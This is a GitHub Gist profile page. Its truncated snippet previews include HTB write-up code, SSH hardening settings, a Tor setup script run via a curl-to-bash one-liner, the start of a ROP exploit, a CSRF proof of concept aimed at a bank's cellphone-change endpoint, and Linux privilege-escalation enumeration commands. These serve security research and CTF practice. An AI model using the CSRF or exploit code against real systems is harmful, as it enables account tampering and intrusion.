Skip to content

Instantly share code, notes, and snippets.

View cedriczirtacic's full-sized avatar
🐗
æ

cedric cedriczirtacic

🐗
æ
49 followers · 56 following
View GitHub Profile
@cedriczirtacic
cedriczirtacic / decrypt_main.py
Created September 3, 2020 21:27
HTB/headache
import sys
path = sys.argv[1]
main_addr = 0x1faf
main_size = 1749
main_real = ''
main = ''
key = "a15abe90c112d09369d9f9da9a8c046e"
key_len = len(key)
@cedriczirtacic
cedriczirtacic / attributes.rb
Created April 20, 2019 23:34 — forked from lizthegrey/attributes.rb
Hardening SSH with 2fa
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'
@cedriczirtacic
cedriczirtacic / tor_ssh.sh
Created March 6, 2019 18:56
from https://gitlab.com/grownetics/devops/blob/master/tor_ssh.sh
#!/bin/bash
# TOR Setup Script
# Author: Nick Busey
#
# This file is meant to get SSH access via Tor to an Ubuntu server in one command.
#
# Quick Usage (as root): $ bash <(curl -s https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh)
#
# Usage for the paranoid:
@cedriczirtacic
cedriczirtacic / wol.py
Created February 12, 2019 16:11
wake-on-lan using scapy
from scapy.sendrecv import send
from scapy.layers.inet import *
from binascii import unhexlify
import sys
magic = ''
for h in sys.argv[1].split(':'): magic += unhexlify(h);
send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=(chr(0xff)*6 + magic*16)))
@cedriczirtacic
cedriczirtacic / vm_admin.sh
Last active April 11, 2022 21:27
quick VBox (headless) admin script
#!/bin/bash
# cedric
# XXX: this is how I prefer to stop a VM, change this at will
PREFERRED_STOP_METHOD="acpipowerbutton"
function perror() { echo -e $@ 1>&2; }
function vm_exists() {
local VM=$1
VBoxManage showvminfo "${VM}" >/dev/null 2>&1
return $?
@cedriczirtacic
cedriczirtacic / mymaths_solve.py
Created January 25, 2019 01:41
#!/usr/bin/python
import logging
from angr import *
from pwn import log
'''
[0x00001080]> afl~com
0x00001173 3 110 sym.comprueba_0
0x000011e1 3 112 sym.comprueba_1
0x00001251 3 116 sym.comprueba_2
@cedriczirtacic
cedriczirtacic / rop.py
Created January 14, 2019 16:58
Frolic rop exploit
#!/usr/bin/python
from struct import pack
def little(x):
return pack('<I', x)
buf_len = 52
libc_addr = 0xb7e19000
system_off = 0x0003ada0
@cedriczirtacic
cedriczirtacic / cell_bac_csrf.html
Created August 28, 2018 17:51
<html>
<head>
<script type="text/javascript" src="https://blue.baccredomatic.com/js/jquery-3.3.1.min.js"></script>
</head>
<body onload="change();">
<p>cellphone change poc</p>
<script type="text/javascript">
function change()
{
var paramsValues = {cellPhoneNumber: "12345678" };
@cedriczirtacic
cedriczirtacic / steghide.md
Last active June 20, 2022 21:22

Compile steghide in macOS X

Check if gettext is installed, if not use Homebrew to get it:

$ brew install gettext

Get the gettext library and cpp flags, and configure with those flags:

$ brew info gettext | grep FLAGS
@cedriczirtacic
cedriczirtacic / linux_privesc
Created June 14, 2018 23:53 — forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs